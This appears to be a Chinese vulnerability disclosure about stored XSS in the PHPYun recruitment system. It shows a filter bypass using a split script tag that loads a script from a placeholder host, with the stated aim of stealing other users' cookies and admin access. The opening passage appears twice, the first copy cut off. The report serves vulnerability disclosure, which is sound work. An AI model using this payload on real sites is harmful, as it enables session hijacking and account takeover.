### 简要描述: php云人才系统多处Xss漏洞(绕过360),可影响后台及其他用户。 360防护挂掉了,这该怎么办。。 ### 详细说明: 虽然php云人才系统里加入360防注入脚本,对于一般的xss都可以过滤 但是我意外的发现了一种绕过方法,从而对多处产生xss影响 先说下绕过方法 <script>肯定是过不了的,但是<scr%20ipt>就可以了 至于这个%20加哪就随意了,总之就是不要使句子完整出现,这样可以绕过360,然后是数据提交后,会变回<script>,从而绕过。 可以利用的xss地方很多 凡是有编辑器,源码模式下直接插入<scr%20ipt src="http://XXXX"></sc%20ript>就行 以官网demo为例子,除了上述地方可以插入xss代码外,在http://www.hr135.com/friend [<img src="https://images.seebug.org/upload/201407/21181400da1e2209c95623f7cf80f0ea0c44c9de.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/21181400da1e2209c95623f7cf80f0ea0c44c9de.png) 到个人中心看一下 [<img src="https://images.seebug.org/upload/201407/21181418dd4418d0c5a88ea564875ee7a9015577.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/21181418dd4418d0c5a88ea564875ee7a9015577.png) 成功插进去 也就是说当别人访问自己的空间时,就可以盗取对方cookie 再说下一处Xss漏洞 举例地址:http://www.hr135.com/ask/index.php 回答别人的问题 [<img...
### 简要描述: php云人才系统多处Xss漏洞(绕过360),可影响后台及其他用户。 360防护挂掉了,这该怎么办。。 ### 详细说明: 虽然php云人才系统里加入360防注入脚本,对于一般的xss都可以过滤 但是我意外的发现了一种绕过方法,从而对多处产生xss影响 先说下绕过方法 <script>肯定是过不了的,但是<scr%20ipt>就可以了 至于这个%20加哪就随意了,总之就是不要使句子完整出现,这样可以绕过360,然后是数据提交后,会变回<script>,从而绕过。 可以利用的xss地方很多 凡是有编辑器,源码模式下直接插入<scr%20ipt src="http://XXXX"></sc%20ript>就行 以官网demo为例子,除了上述地方可以插入xss代码外,在http://www.hr135.com/friend [<img src="https://images.seebug.org/upload/201407/21181400da1e2209c95623f7cf80f0ea0c44c9de.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/21181400da1e2209c95623f7cf80f0ea0c44c9de.png) 到个人中心看一下 [<img src="https://images.seebug.org/upload/201407/21181418dd4418d0c5a88ea564875ee7a9015577.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/21181418dd4418d0c5a88ea564875ee7a9015577.png) 成功插进去 也就是说当别人访问自己的空间时,就可以盗取对方cookie 再说下一处Xss漏洞 举例地址:http://www.hr135.com/ask/index.php 回答别人的问题 [<img src="https://images.seebug.org/upload/201407/211854386ec52c576300dcc0d30294cbb93697e2.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/211854386ec52c576300dcc0d30294cbb93697e2.png) [<img src="https://images.seebug.org/upload/201407/21185451da96a91a8a790fde04bb9d9519d92734.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/21185451da96a91a8a790fde04bb9d9519d92734.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201407/2118225584ad6392eb31f761815ec1ccac85cd64.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/2118225584ad6392eb31f761815ec1ccac85cd64.png) [<img src="https://images.seebug.org/upload/201407/21182302cc93199c77a497f43b3fef9806d6d23b.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/21182302cc93199c77a497f43b3fef9806d6d23b.png) 有了后台的权限 自然。。。